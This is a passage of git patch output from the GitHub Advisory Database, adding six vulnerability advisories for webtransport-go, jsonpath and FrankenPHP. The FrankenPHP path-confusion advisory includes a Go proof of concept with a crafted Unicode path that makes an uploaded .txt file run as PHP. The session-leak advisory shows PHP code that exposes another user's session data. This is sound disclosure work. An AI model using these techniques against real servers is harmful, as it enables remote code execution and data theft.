older, vulnerable version of those base layers.\n\n## Impact\n\nUsers pulling FrankenPHP images may have been running environments with known vulnerabilities in underlying system libraries (e.g., `libcrypto3`) even if they were using the \"latest\" version of a specific FrankenPHP tag.\n\nSpecifically, this includes vulnerabilities recently patched in **Alpine 3.20.9, 3.21.6, 3.22.3, and 3.23.3**, such as **CVE-2025-15467** (Remote Code Execution in `libcrypto3`).\n\n## Details\n\nThe issue was a lack of automated \"staleness\" detection in the CI/CD pipeline.\n\nUnless explicitly told, our build server was building new Docker images only when a new tag for base images was created. However, base images such as Alpine, PHP, and Go usually overwrite existing Docker tags to apply security fixes, which wasn't triggering a new build on our side.\n\n## Patches\n\nAs of **February 4, 2026**, the CI/CD pipeline has been updated.\n\n* **Automated Detection:** A daily check is now performed to compare the digest of local base images against upstream registries.\n* **Auto-Rebuild:** If a change is detected in base images (even if the tag name remains the same), FrankenPHP images are automatically rebuilt and re-pushed.\n\n**Users are advised to pull the latest versions of their specific tags to receive these updates.**\n\n## Workarounds\n\nYou can force a local rebuild of your environment using the `--pull` flag to ensure you are fetching the latest patched base layers:\n\n```bash\ndocker pull dunglas/frankenphp:latest\n# If building your own image based on FrankenPHP\ndocker build --pull -t my-app .\n```\n\n## References\n\n* [Alpine Linux Security Advisories](https://www.alpinelinux.org/posts/Alpine-3.20.9-3.21.6-3.22.3-3.23.3-released.html)\n* **CVE-2025-15467** (RCE in libcrypto3)\n\n## Credits\n\nFrankenPHP thanks [Tim Nelles](https://timnelles.de/) for reporting and fixing this issue.", + "details": "# Delayed propagation of security fixes in upstream base images\n\n## Summary\n\n**Vulnerability in base Docker images (PHP, Go, and Alpine) not automatically propagating to FrankenPHP images.**\n\nFrankenPHP's container images were previously built only when specific version tags were updated or when manual triggers were initiated. This meant that if an upstream base image (such as Alpine Linux or official PHP/Go images) received a security patch under an existing tag, the FrankenPHP image would remain on the older, vulnerable version of those base layers.\n\n## Impact\n\nUsers pulling FrankenPHP images may have been running environments with known vulnerabilities in underlying system libraries (e.g., `libcrypto3`) even if they were using the \"latest\" version of a specific FrankenPHP tag.\n\nSpecifically, this includes vulnerabilities recently patched in **Alpine 3.20.9, 3.21.6, 3.22.3, and 3.23.3**, such as **CVE-2025-15467** (Remote Code Execution in `libcrypto3`).\n\n## Details\n\nThe issue was a lack of automated \"staleness\" detection in the CI/CD pipeline.\n\nUnless explicitly told, our build server was building new Docker images only when a new tag for base images was created. However, base images such as Alpine, PHP, and Go usually overwrite existing Docker tags to apply security fixes, which wasn't triggering a new build on our side.\n\n## Patches\n\nAs of **February 4, 2026**, the CI/CD pipeline has been updated.\n\n* **Automated Detection:** A daily check is now performed to compare the digest of local base images against upstream registries.\n* **Auto-Rebuild:** If a change is detected in base images (even if the tag name remains the same), FrankenPHP images are automatically rebuilt and re-pushed.\n\n**Users are advised to pull the latest versions of their specific tags to receive these updates.**\n\n## Workarounds\n\nYou can force a local rebuild of your environment using the `--pull` flag to ensure you are fetching the latest patched base layers:\n\n```bash\ndocker pull dunglas/frankenphp:latest\n# If building your own image based on FrankenPHP\ndocker build --pull -t my-app .\n```\n\n## References\n\n* [Alpine Linux Security Advisories](https://www.alpinelinux.org/posts/Alpine-3.20.9-3.21.6-3.22.3-3.23.3-released.html)\n* **CVE-2025-15467** (RCE in libcrypto3)\n\n## Credits\n\nThanks to [Tim Nelles](https://timnelles.de/) for reporting and fixing this issue.", "severity": [ { "type": "CVSS_V3", From 0ddf0ea1ee329dc4bef8d18f3c3ebefeb5fdfef9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 15:30:42 +0000 Subject: [PATCH 033/215] Publish Advisories GHSA-2f2x-8mwp-p2gc GHSA-87r5-mp6g-5w5j GHSA-g6x7-jq8p-6q9q GHSA-g966-83w7-6w38 GHSA-px4r-g4p3-hhqv GHSA-r3xh-3r3w-47gp GHSA-87r5-mp6g-5w5j --- .../GHSA-2f2x-8mwp-p2gc.json | 65 +++++++++++++++++ .../GHSA-87r5-mp6g-5w5j.json | 73 +++++++++++++++++++ .../GHSA-g6x7-jq8p-6q9q.json | 64 ++++++++++++++++ .../GHSA-g966-83w7-6w38.json | 61 ++++++++++++++++ .../GHSA-px4r-g4p3-hhqv.json | 64 ++++++++++++++++ .../GHSA-r3xh-3r3w-47gp.json | 62 ++++++++++++++++ .../GHSA-87r5-mp6g-5w5j.json | 48 ------------ 7 files changed, 389 insertions(+), 48 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json diff --git a/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json b/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json new file mode 100644 index 0000000000000..cd4ca07ea21cc --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2f2x-8mwp-p2gc", + "modified": "2026-02-12T15:29:11Z", + "published": "2026-02-12T15:29:11Z", + "aliases": [ + "CVE-2026-21438" + ], + "summary": "webtransport-go: Memory Exhaustion Attack due to Missing Cleanup of Streams Map", + "details": "## Summary\nAn attacker can cause unbounded memory consumption repeatedly creating and closing many WebTransport streams. Closed streams were not removed from an internal session map, preventing garbage collection of their resources.\n\n## Details\nwebtransport-go maintains an internal map tracking WebTransport streams (both unidirectional and bidirectional) belonging to a session. In affected versions, entries for closed streams were not removed from this map, causing the map to grow indefinitely as streams were created and closed.\n\nA malicious peer can exploit this by opening large numbers of streams and closing them, leading to steady memory growth proportional to the number of closed streams.\n\n## The Fix\nwebtransport-go now removes closed streams from the internal map upon closure. This allows the associated resources to be garbage collected, bounding memory usage to active streams only.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/quic-go/webtransport-go" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-2f2x-8mwp-p2gc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/quic-go/webtransport-go" + }, + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/releases/tag/v0.10.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401", + "CWE-459" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:29:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json b/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json new file mode 100644 index 0000000000000..5ea36ae35cac0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87r5-mp6g-5w5j", + "modified": "2026-02-12T15:29:55Z", + "published": "2026-02-09T06:30:28Z", + "aliases": [ + "CVE-2026-1615" + ], + "summary": "jsonpath has Arbitrary Code Injection via Unsafe Evaluation of JSON Path Expressions", + "details": "### Impact\n\n**Arbitrary Code Injection (Remote Code Execution & XSS):**\n\nA critical security vulnerability affects **all versions** of the `jsonpath` package. The library relies on the `static-eval` module to evaluate JSON Path expressions but fails to properly sanitize or sandbox the input.\n\nThis allows an attacker to inject arbitrary JavaScript code into the JSON Path expression. When the library evaluates this expression, the malicious code is executed.\n\n* **Node.js Environments:** This leads to **Remote Code Execution (RCE)**, allowing an attacker to compromise the server.\n* **Browser Environments:** This leads to **Cross-Site Scripting (XSS)**, allowing an attacker to hijack user sessions or exfiltrate data.\n\n**Affected Methods:**\n\nThe vulnerability triggers when untrusted data is passed to any method that evaluates a path, including:\n\n* `jsonpath.query`\n* `jsonpath.nodes`\n* `jsonpath.paths`\n* `jsonpath.value`\n* `jsonpath.parent`\n* `jsonpath.apply`\n\n### Patches\n\n**No Patch Available:**\n\nCurrently, **all versions** of `jsonpath` are vulnerable. There is no known patched version of this package that resolves the issue while retaining the current architecture.\n\n**Recommendation:**\n\nDevelopers are strongly advised to **migrate to a secure alternative** (such as `jsonpath-plus` or similar libraries that do not use `eval`/`static-eval`) or strictly validate all JSON Path inputs against a known allowlist.\n\n### Workarounds\n\n* **Strict Input Validation:** Ensure that no user-supplied data is ever passed directly to `jsonpath` functions.\n* **Sanitization:** If user input is unavoidable, implement a strict parser to reject any JSON Path expressions containing executable JavaScript syntax (e.g., parentheses `()`, script expressions `script:`, or function calls).\n\n### Resources\n\n* [CVE-2026-1615](https://nvd.nist.gov/vuln/detail/CVE-2026-1615)\n* [Vulnerable Code in handlers.js](https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js#L243)\n* [Snyk Advisory (Java/WebJars)](https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219)\n* [Snyk Advisory (JS)](https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "jsonpath" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615" + }, + { + "type": "PACKAGE", + "url": "https://github.com/dchester/jsonpath" + }, + { + "type": "WEB", + "url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js#L243" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:29:55Z", + "nvd_published_at": "2026-02-09T05:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json b/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json new file mode 100644 index 0000000000000..8fc9959301e46 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6x7-jq8p-6q9q", + "modified": "2026-02-12T15:28:52Z", + "published": "2026-02-12T15:28:52Z", + "aliases": [ + "CVE-2026-21434" + ], + "summary": "webtransport-go: Memory Exhaustion Attack due to Missing Length Check in WT_CLOSE_SESSION Capsule", + "details": "## Summary\nAn attacker can cause excessive memory consumption in webtransport-go's session implementation by sending a WT_CLOSE_SESSION capsule containing an excessively large Application Error Message. The implementation does not enforce the draft-mandated limit of 1024 bytes on this field, allowing a peer to send an arbitrarily large message payload that is fully read and stored in memory.\n\nThis allows an attacker to consume an arbitrary amount of memory. The attacker must transmit the full payload to achieve the memory consumption, but the lack of any upper bound makes large-scale attacks feasible given sufficient bandwidth.\n\n## Details\nWebTransport over HTTP/3, as defined in draft-ietf-webtrans-http3, uses the WT_CLOSE_SESSION capsule to signal session termination with an optional detailed error. The draft specifies that the length of the Application Error Message in this capsule MUST NOT exceed 1024 bytes.\nIn affected versions of webtransport-go, the parser does not enforce this 1024-byte maximum when processing incoming WT_CLOSE_SESSION capsules. A peer can send a capsule with an excessively large payload, forcing the recipient to allocate and buffer the full amount of transmitted data without bound.\n\n## The Fix\nwebtransport-go now limits the length of the parsed Application Error Message to 1024 bytes in WT_CLOSE_SESSION capsules by reading no more than this amount. This prevents excessive memory consumption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/quic-go/webtransport-go" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.3.0" + }, + { + "fixed": "0.10.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-g6x7-jq8p-6q9q" + }, + { + "type": "PACKAGE", + "url": "https://github.com/quic-go/webtransport-go" + }, + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/releases/tag/v0.10.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:28:52Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json b/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json new file mode 100644 index 0000000000000..9ead91f8ceb71 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g966-83w7-6w38", + "modified": "2026-02-12T15:29:36Z", + "published": "2026-02-12T15:29:36Z", + "aliases": [ + "CVE-2026-24895" + ], + "summary": "FrankenPHP's unicode case-folding length expansion causes incorrect split_path index (SCRIPT_NAME/PATH_INFO confusion) in FrankenPHP", + "details": "### Summary\n\nFrankenPHP’s CGI path splitting logic improperly handles Unicode characters during case conversion. The logic computes the split index (for finding `.php`) on a lowercased copy of the request path but applies that byte index to the original path.\n\nBecause `strings.ToLower()` in Go can increase the byte length of certain UTF-8 characters (e.g., `Ⱥ` expands when lowercased), the computed index may not align with the correct position in the original string. This results in an incorrect `SCRIPT_NAME` and `SCRIPT_FILENAME`, potentially causing FrankenPHP to execute a file other than the one intended by the URI.\n\n### **Details**\n\nThe vulnerability resides in the `splitPos()` function and its usage within `splitCgiPath()`. The logic attempts to find the script extension (e.g., `.php`) in a case-insensitive manner by lowercasing the path:\n\n```go\nlowerPath := strings.ToLower(path)\nidx := strings.Index(lowerPath, strings.ToLower(split))\nreturn idx + len(split)\n```\n\nThe issue is that the returned `idx` represents a byte offset within `lowerPath`. However, `splitCgiPath()` uses this index to slice the **original** `path`:\n\n```go\nfc.docURI = path[:splitPos]\nfc.pathInfo = path[splitPos:]\nfc.scriptName = strings.TrimSuffix(path, fc.pathInfo)\nfc.scriptFilename = sanitizedPathJoin(fc.documentRoot, fc.scriptName)\n```\n\nThis logic relies on the assumption that `len(strings.ToLower(path)) == len(path)`. This assumption is false for certain Unicode characters. For example, the character `Ⱥ` (U+023A) requires 2 bytes in UTF-8 (`0xC8 0xBA`), but its lowercase equivalent `ⱥ` (U+2C65) requires 3 bytes (`0xE2 0xB1 0xA5`).\n\nIf the path contains such characters before the `.php` extension, the index calculated on `lowerPath` will be larger than the corresponding visual point in the original `path`. When applied to the original path, the split occurs at the wrong byte offset. This can cause the server to treat a larger portion of the path as the script name, effectively allowing an attacker to manipulate `SCRIPT_FILENAME`.\n\n### **PoC**\n\nThe following Go program demonstrates the discrepancy between the byte index in the lowercased string versus the original string.\n\n1. Save the following as `poc.go`:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"strings\"\n)\n\nfunc splitPos(path string, split string) int {\n lowerPath := strings.ToLower(path)\n idx := strings.Index(lowerPath, strings.ToLower(split))\n if idx < 0 {\n return -1\n }\n return idx + len(split)\n}\n\nfunc main() {\n // U+023A: Ⱥ (UTF-8: C8 BA). Lowercase is ⱥ (UTF-8: E2 B1 A5), longer in bytes.\n // We construct a path where the byte expansion shifts the index.\n path := \"/ȺȺȺȺshell.php.txt.php\"\n split := \".php\"\n\n pos := splitPos(path, split)\n\n fmt.Printf(\"orig bytes=%d\\n\", len(path))\n fmt.Printf(\"lower bytes=%d\\n\", len(strings.ToLower(path)))\n fmt.Printf(\"splitPos=%d\\n\", pos)\n\n // Current Unsafe Behavior:\n fmt.Printf(\"orig[:pos] (Calculated Script)=%q\\n\", path[:pos])\n fmt.Printf(\"orig[pos:] (Calculated PathInfo)=%q\\n\", path[pos:])\n\n // Expected Safe Behavior:\n want := strings.Index(path, split) + len(split)\n fmt.Printf(\"expected splitPos=%d\\n\", want)\n fmt.Printf(\"expected orig[:]=%q\\n\", path[:want])\n}\n```\n\n2. Run the PoC:\n\n```console\ngo run poc.go\n```\n\n3. **Output:**\n\n```text\norig bytes=26\nlower bytes=30\nsplitPos=22\norig[:pos]=\"/ȺȺȺȺshell.php.txt\"\norig[pos:]=\".php\"\nexpected splitPos=18\nexpected orig[:]=\"/ȺȺȺȺshell.php\"\n```\n\nIn this example, FrankenPHP would identify `/ȺȺȺȺshell.php.txt` as the PHP script to execute, ignoring the fact that the actual file extension in the file system might be `.txt`.\n\n### Impact*\n\nThis is a **Security Boundary Bypass** and **Path Confusion** vulnerability.\n\nIn setups where users can upload files (e.g., avatars, text files) that are stored within the document root or a reachable path, an attacker can upload a file containing malicious PHP code with a safe extension (e.g., `payload.txt`). By crafting a request with specific Unicode characters, the attacker can force FrankenPHP to calculate the `SCRIPT_FILENAME` as ending in `payload.txt`, while the request appears to contain `.php` to the internal router logic.\n\nThis results in the execution of non-PHP files as PHP scripts, leading to **Remote Code Execution (RCE)**.\n\n### **Patched Versions**\n\n* This issue is fixed in FrankenPHP version **1.11.2**.\n\n### **Workarounds**\n\n* Ensure that user-uploaded files are stored outside of the public document root.\n* Implement strict WAF rules to reject requests containing specific multi-byte Unicode characters in the URL path if an upgrade is not immediately possible.", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/dunglas/frankenphp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/security/advisories/GHSA-g966-83w7-6w38" + }, + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/commit/04fdc0c1e8fde94e2c1ad86217e962c88d27c53e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/php/frankenphp" + }, + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/releases/tag/v1.11.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-180", + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:29:36Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json b/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json new file mode 100644 index 0000000000000..0c1b2cb68df0a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px4r-g4p3-hhqv", + "modified": "2026-02-12T15:29:02Z", + "published": "2026-02-12T15:29:01Z", + "aliases": [ + "CVE-2026-21435" + ], + "summary": "webtransport-go: CloseWithError can block indefinitely", + "details": "## Summary\nAn attacker can cause a denial of service in webtransport-go by preventing or indefinitely delaying WebTransport session closure. A malicious peer can withhold QUIC flow control credit on the CONNECT stream, blocking transmission of the WT_CLOSE_SESSION capsule and causing the close operation to hang.\n\n## Details\nWebTransport over HTTP/3 signals session termination by sending a WT_CLOSE_SESSION capsule on the CONNECT stream. The capsule is only needed to transmit a reason phrase and an error code to the peer. After the capsule is sent, the CONNECT stream is closed.\nIn affected versions, the closure procedure blocked indefinitely while waiting for sufficient QUIC flow control credit from the peer. A malicious peer can withhold this credit, preventing the capsule from being sent.\n\n## The Fix\nwebtransport-go now attempts to send the WT_CLOSE_SESSION capsule with a short deadline. If the capsule cannot be sent within this deadline, the CONNECT stream is reset instead. This closes the WebTransport session promptly without transmitting the optional error details.\nThis prevents indefinite blocking on session closure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/quic-go/webtransport-go" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-px4r-g4p3-hhqv" + }, + { + "type": "PACKAGE", + "url": "https://github.com/quic-go/webtransport-go" + }, + { + "type": "WEB", + "url": "https://github.com/quic-go/webtransport-go/releases/tag/v0.10.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:29:01Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json b/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json new file mode 100644 index 0000000000000..b0d0b8c621cb2 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3xh-3r3w-47gp", + "modified": "2026-02-12T15:29:30Z", + "published": "2026-02-12T15:29:30Z", + "aliases": [ + "CVE-2026-24894" + ], + "summary": "FrankenPHP leaks session data between requests in worker mode", + "details": "### Summary\n\nWhen running FrankenPHP in **worker mode**, the `$_SESSION` superglobal is not correctly reset between requests. This allows a subsequent request processed by the same worker to access the `$_SESSION` data of the previous request (potentially belonging to a different user) before `session_start()` is called.\n\n### Details\n\nIn standard PHP execution, the environment is torn down completely after every request. In FrankenPHP's worker mode, the application stays in memory, and superglobals are manually reset between requests.\n\nThe vulnerability exists because `$_SESSION` is stored in the Zend Engine's symbol table (`EG(symbol_table)`). While the standard PHP request shutdown (RSHUTDOWN) decrements the reference count of the session data, it does not remove the `$_SESSION` variable itself from the symbol table. FrankenPHP's reset logic (`frankenphp_reset_super_globals`) previously cleared other superglobals but failed to explicitly delete `$_SESSION`.\n\nConsequently, until `session_start()` is called in the new request (which re-initializes the variable), the `$_SESSION` array retains the data from the previous request processed by that specific worker thread.\n\n### Impact\n\nThis is a **cross-request data leakage** vulnerability.\n\n* **Confidentiality:** If an application reads `$_SESSION` before calling `session_start()`, it can access sensitive information (authentication tokens, user IDs, PII) belonging to the previous user.\n* **Logic Errors / Impersonation:** If application logic relies on `$_SESSION` being empty or unset to detect a \"guest\" state, or checks for specific keys in `$_SESSION` prior to session initialization, a malicious actor (or accidental race condition) could trigger privilege escalation or user impersonation.\n\nThis affects only users running FrankenPHP in **worker mode** and not `session_start()` for each request, which is done by default by most frameworks.\n\n### PoC\n\nThe following steps demonstrate the issue (derived from the regression tests added in the fix):\n\n1. **Client A** sends a request that starts a session and sets sensitive data:\n\n```php\n// Request 1\nsession_start();\n$_SESSION['secret'] = 'AliceData';\nsession_write_close();\n```\n\n2. **Client B** (or the same client without cookies) sends a request to the same worker. This script checks `$_SESSION` *without* starting a session:\n\n```php\n// Request 2\n// session_start() is NOT called\nif (!empty($_SESSION)) {\n echo \"Leaked Data: \" . $_SESSION['secret'];\n}\n```\n\n\n3. **Result:** Client B receives \"Leaked Data: AliceData\".\n\n### Workarounds\n\n* Ensure `session_start()` is called immediately at the entry point of your worker script to overwrite any residual data (though this may not cover all edge cases if middleware runs before the controller).\n* Manually unset `$_SESSION` at the very beginning of the worker loop, before handling the request.", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/dunglas/frankenphp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/security/advisories/GHSA-r3xh-3r3w-47gp" + }, + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/commit/24d6c991a7761b638190eb081deae258143e9735" + }, + { + "type": "PACKAGE", + "url": "https://github.com/php/frankenphp" + }, + { + "type": "WEB", + "url": "https://github.com/php/frankenphp/releases/tag/v1.11.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269", + "CWE-384", + "CWE-613" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:29:30Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json b/advisories/unreviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json deleted file mode 100644 index 14cc6287d1b1a..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-87r5-mp6g-5w5j/GHSA-87r5-mp6g-5w5j.json +++ /dev/null @@ -1,48 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-87r5-mp6g-5w5j", - "modified": "2026-02-09T06:30:28Z", - "published": "2026-02-09T06:30:28Z", - "aliases": [ - "CVE-2026-1615" - ], - "details": "All versions of the package jsonpath are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle untrusted data safely. An attacker can exploit this vulnerability by supplying a malicious JSON Path expression that, when evaluated, executes arbitrary JavaScript code, leading to Remote Code Execution in Node.js environments or Cross-site Scripting (XSS) in browser contexts. This affects all methods that evaluate JSON Paths against objects, including .query, .nodes, .paths, .value, .parent, and .apply.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615" - }, - { - "type": "WEB", - "url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-94" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T05:16:24Z" - } -} \ No newline at end of file From 3e389548dfa7991a64d62a8a9ccf932e1a8e114c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 15:34:39 +0000 Subject: [PATCH 034/215] Advisory Database Sync --- .../GHSA-8x3f-4jvw-ww73.json | 6 ++- .../GHSA-23f5-mvxj-rqhr.json | 15 +++++-- .../GHSA-2xqp-gcm9-67f8.json | 36 +++++++++++++++ .../GHSA-39q6-v89p-42vg.json | 9 +++- .../GHSA-3c56-h59m-r49v.json | 36 +++++++++++++++ .../GHSA-45q5-pv8q-m46g.json | 6 ++- .../GHSA-4chc-49pc-wcqq.json | 6 ++- .../GHSA-4r22-3675-4h3p.json | 6 ++- 